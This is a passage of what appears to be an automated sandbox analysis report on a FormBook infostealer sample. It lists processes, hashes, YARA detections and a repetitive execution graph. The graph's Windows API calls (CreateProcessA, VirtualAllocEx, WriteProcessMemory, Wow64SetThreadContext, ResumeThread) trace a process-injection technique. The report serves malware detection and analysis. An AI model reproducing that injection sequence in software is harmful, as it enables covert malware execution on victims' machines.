                                                                        MD5 hash:28D565BB24D30E5E3DE8AFF6900AF098
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        Target ID:18
                                                                        Start time:03:13:43
                                                                        Start date:28/11/2024
                                                                        Path:C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe"
                                                                        Imagebase:0xe20000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Has exited:false

                                                                        Target ID:20
                                                                        Start time:03:13:54
                                                                        Start date:28/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff79f9e0000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:10.7%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:211
                                                                          Total number of Limit Nodes:7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d74ea547d83fc4726b24ec25516717445ff484508a1318c99b5106de0e04f299
                                                                          • Instruction ID: 02821868bb3a9ead0b1d48bd79fcf9644eb8af56c8aabf00961ac52d23328dd9
                                                                          • Opcode Fuzzy Hash: d74ea547d83fc4726b24ec25516717445ff484508a1318c99b5106de0e04f299
                                                                          • Instruction Fuzzy Hash: B591C7B8E012098FCB44DFA9C990AEEFBB2FF88310F148069D515AB3A5DB355946DF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 167eb4d19ab1befc33da1f2fda57779d72a948c5f9d44a51099ef5d5ecb92e78
                                                                          • Instruction ID: 26ca6b001c46a5b1628e44605c101faac494759cc3221c1e792a9c9a1b0ba84e
                                                                          • Opcode Fuzzy Hash: 167eb4d19ab1befc33da1f2fda57779d72a948c5f9d44a51099ef5d5ecb92e78
                                                                          • Instruction Fuzzy Hash: 8081B5B8E012098FCB48DFA9C990AEEFBB2FF88310F148069D515AB365DB315945DF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7085d98f1453d4f8a25b79d933a853c418c738e87372862d480939549259fce8
                                                                          • Instruction ID: b76e038799f019c116c1130668b33bdba99cd57f9267e9b1917c2f2e34e5d954
                                                                          • Opcode Fuzzy Hash: 7085d98f1453d4f8a25b79d933a853c418c738e87372862d480939549259fce8
                                                                          • Instruction Fuzzy Hash: BDE04635D0E2848FC702DB3499852F0BBFEAB0B200F5821D6C88ADB113C22946A48B1A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F19ECE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: c3e27e036f291b0bb2780521d4f79d0fa2f731ccbe6db6792cfeb4d81c8341ee
                                                                          • Instruction ID: 1842a00b1bc7b44b573f8b96f859aaec2b0951d688083804ffacdb500119e9a8
                                                                          • Opcode Fuzzy Hash: c3e27e036f291b0bb2780521d4f79d0fa2f731ccbe6db6792cfeb4d81c8341ee
                                                                          • Instruction Fuzzy Hash: E6A18D71D00219DFDF20DF68C955BEDBBB2BF48310F0481A9E849A7284DBB89985CF95

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F19ECE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 72731f6044245a956be93df73dbea295e212dcbdbb988f10260149c3562ae92e
                                                                          • Instruction ID: e22ea1f229b3b14a2bf3971c364e3aef17b4d7c4f7ca8873d4bed78ce614e3c4
                                                                          • Opcode Fuzzy Hash: 72731f6044245a956be93df73dbea295e212dcbdbb988f10260149c3562ae92e
                                                                          • Instruction Fuzzy Hash: 5A918C71D00219DFDF20DF68C951BEDBBB2BF48310F0481A9E809A7284DBB89985CF95

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031FB51E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: fabee3ec9ef5312dc8dc897a1048237e99cc1f3785a9109708f239034cf8f277
                                                                          • Instruction ID: 544c1d5cc433ba81d30e5e17520712e40446d07a0f09fa8243b97c7f52cb182c
                                                                          • Opcode Fuzzy Hash: fabee3ec9ef5312dc8dc897a1048237e99cc1f3785a9109708f239034cf8f277
                                                                          • Instruction Fuzzy Hash: 228145B0A04B058FD724DF29D1407AABBF5FF88300F148A6DE58ADBA50D775E849CB91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 031F5E89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: bbbb8397d8bc7b4c362f4765f5f6934300242d53d3cf2d02fe008b4bb7375015
                                                                          • Instruction ID: c4bb3e4f99f771a8d57246ff140b5ef7cda263101e3f9f966dff9e8e66cc3be8
                                                                          • Opcode Fuzzy Hash: bbbb8397d8bc7b4c362f4765f5f6934300242d53d3cf2d02fe008b4bb7375015
                                                                          • Instruction Fuzzy Hash: 1141E2B0C00619CFDB24CFA9C844B8EFBB6BF4A304F20806AD508AB255DB756945CFA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 031F5E89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F19AA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F19AA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F19B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F194BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031FD76E,?,?,?,?,?), ref: 031FD82F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,031FD76E,?,?,?,?,?), ref: 031FD82F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F194BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F19B80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F199BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F199BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 031FB51E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 05F1E16D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 05F1E16D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 980e5a60dfb164d0a39f7f372bf1c70e1de426fe641f1bf481842f5cb2b9f330
                                                                          • Instruction ID: 71f7652cc2059633110c5a6f4dee0c819724c0b38ca31fe2eaba6e9b36f2bb17
                                                                          • Opcode Fuzzy Hash: 980e5a60dfb164d0a39f7f372bf1c70e1de426fe641f1bf481842f5cb2b9f330
                                                                          • Instruction Fuzzy Hash: F02126B1A04200EFDB05DF14D9C0B2ABBA5FF94314F28C9ADED4A4B252C336D407CA65
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: feb428a29d34c076c782554eebe97ea8e80e89c9549f054f195e91651cc99c99
                                                                          • Instruction ID: 01b6753aa2af0c20869310ab5ec8f91ab6669f27511af3c729a726497d306126
                                                                          • Opcode Fuzzy Hash: feb428a29d34c076c782554eebe97ea8e80e89c9549f054f195e91651cc99c99
                                                                          • Instruction Fuzzy Hash: B12104B5A04240DFDB14DF14D9C4B2ABBA5FF84314F28C9ADD90A4B246C33AD417CAA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 434d62670bcd680dc89d813ee6d41063904e893405cfc1674c45d1081513f7f2
                                                                          • Instruction ID: 3333aa689e990c23943e0dc5a6841a3b6b966738e443055e453d1e8f57a5132d
                                                                          • Opcode Fuzzy Hash: 434d62670bcd680dc89d813ee6d41063904e893405cfc1674c45d1081513f7f2
                                                                          • Instruction Fuzzy Hash: 062184755093808FDB12CF24D994715BFB1EF46214F28C5DAD8498F6A7C33AD41ACBA2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction ID: f1f146a06dd4413577a8806be9acf06448638d28c421ae104c69be7674bc8503
                                                                          • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                          • Instruction Fuzzy Hash: 3C11E676905280CFCB16CF14D5D4B16BFB1FB84314F28C6A9D8490B65AC336D45ACBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153294564.000000000307D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0307D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_307d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction ID: 0361c625743e144f2e69937dd4012b1ddc4c0dddb5471ff7c0f695d4707656a8
                                                                          • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                          • Instruction Fuzzy Hash: 0F11B875904280DFCB02CF10D5C4B15FBA2FF84224F28C6AAD8494B6A6C33AD40BCB62
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74949bd16f816552d0866b3a715bcd9add8e1cced85dda6094096a00307dade8
                                                                          • Instruction ID: 349b99669cfb45adb514ff1a4b4bc91711c3f9736e1bd6eb7bf6b60a4505c323
                                                                          • Opcode Fuzzy Hash: 74949bd16f816552d0866b3a715bcd9add8e1cced85dda6094096a00307dade8
                                                                          • Instruction Fuzzy Hash: 7801DB716063449AE710CE25DDC476BFFD8DF45324F1CC86AED095A18AE3799844C6B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2153070705.000000000306D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0306D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_306d000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1cbd2685bd63e78912f73a7304185d4eb556e5468c00efb7cbe6f8e280ebbca0
                                                                          • Instruction ID: 940ac44aad228095e9e5a81f84a95833e2fc37065c5f9091e851807364b92f97
                                                                          • Opcode Fuzzy Hash: 1cbd2685bd63e78912f73a7304185d4eb556e5468c00efb7cbe6f8e280ebbca0
                                                                          • Instruction Fuzzy Hash: F1F0CD72505344AEE7108A1ACD88B67FFE8EB85334F18C45AED081E28AD3799844CAB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a0830ca777628f44c044f736460cd598124d884c8ffb5acf9c9dd47b034f4e2b
                                                                          • Instruction ID: 8846f232bb812c7a6340e49bde48bf16d371718910acebf83a5092e490c5de9e
                                                                          • Opcode Fuzzy Hash: a0830ca777628f44c044f736460cd598124d884c8ffb5acf9c9dd47b034f4e2b
                                                                          • Instruction Fuzzy Hash: 7EE116B4E142198FCB14DFA9C5909AEFBF2FF88301F248169D815AB315D734A942CFA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f631dce0225100c5402e8fa0248f84fa14e8e03a5982f5d7fb3a7abc4339e80
                                                                          • Instruction ID: aaf05953d7904c1fed95c12ad0e7d2041276665ab55967029d0e62b7479cafe4
                                                                          • Opcode Fuzzy Hash: 8f631dce0225100c5402e8fa0248f84fa14e8e03a5982f5d7fb3a7abc4339e80
                                                                          • Instruction Fuzzy Hash: A1E118B4E152198FCB14DFA8C5809AEBBF2FF89301F248569D818AB315D734A941CF65
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9aa78f09f0ed76fe16cc89e1e1558b131ffef3353a180ef43cc4c039b53fcfe8
                                                                          • Instruction ID: 019b8986e5187e1dbc26d13e4fb1be8b9d4c25876c273147ce6165f1775b19b8
                                                                          • Opcode Fuzzy Hash: 9aa78f09f0ed76fe16cc89e1e1558b131ffef3353a180ef43cc4c039b53fcfe8
                                                                          • Instruction Fuzzy Hash: E1E105B4E052198FCB14DFA8C5809AEBBF2FF89305F248169D818AB315C734AD42CF65
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a896a29a75a38b5a6f1bdac64c38d9216edda2efbba47801ddef2c96cd676ea6
                                                                          • Instruction ID: e319ab0581094a383447142b0f93f9d7c88a323ef749ddc110345fd82ac233ac
                                                                          • Opcode Fuzzy Hash: a896a29a75a38b5a6f1bdac64c38d9216edda2efbba47801ddef2c96cd676ea6
                                                                          • Instruction Fuzzy Hash: E6E118B4E152198FCB14DFA8C5809AEFBF2FF88305F248169D818AB355D734A981CF65
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47778e54b38927b961169f4592d3bb7bb4668a87242277223db27d49b91c515b
                                                                          • Instruction ID: 431154b5d45bca8be13f382c6a684259353ef6f318291eb8d3bc58659ea2d0dc
                                                                          • Opcode Fuzzy Hash: 47778e54b38927b961169f4592d3bb7bb4668a87242277223db27d49b91c515b
                                                                          • Instruction Fuzzy Hash: DBE117B4E002198FCB14DFA9C5809AEBBF2FF89345F248169D814AB315D734AD42CF65
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2154174128.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_31f0000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db33b3fe1029069b6a46f158d1d130c7e428cb1af808180c7925cb0545cd8888
                                                                          • Instruction ID: 29d2489ac6684dc7474e9fd276d05c9040e601873e2c73ed4939d2ff206ad91a
                                                                          • Opcode Fuzzy Hash: db33b3fe1029069b6a46f158d1d130c7e428cb1af808180c7925cb0545cd8888
                                                                          • Instruction Fuzzy Hash: 6BA19F36E00209CFCF05DFB5C84449EF7B2FF89300B19856AEA05AB265DB75E916CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 13f77b1a09ef1f8ba0caa63e2370b86e4474c39552946a5e30a6c2fb0a2755ba
                                                                          • Instruction ID: 9c35c0b5fbf7765af67d59cb3dd85f338369ab573f151331717a61307a8ae6cc
                                                                          • Opcode Fuzzy Hash: 13f77b1a09ef1f8ba0caa63e2370b86e4474c39552946a5e30a6c2fb0a2755ba
                                                                          • Instruction Fuzzy Hash: D0511AB0E142198BCB14CFA9C5905AEFBF2FF89300F24C16AD818AB315D7759942CFA5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2160280318.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f10000_Documents.jbxd
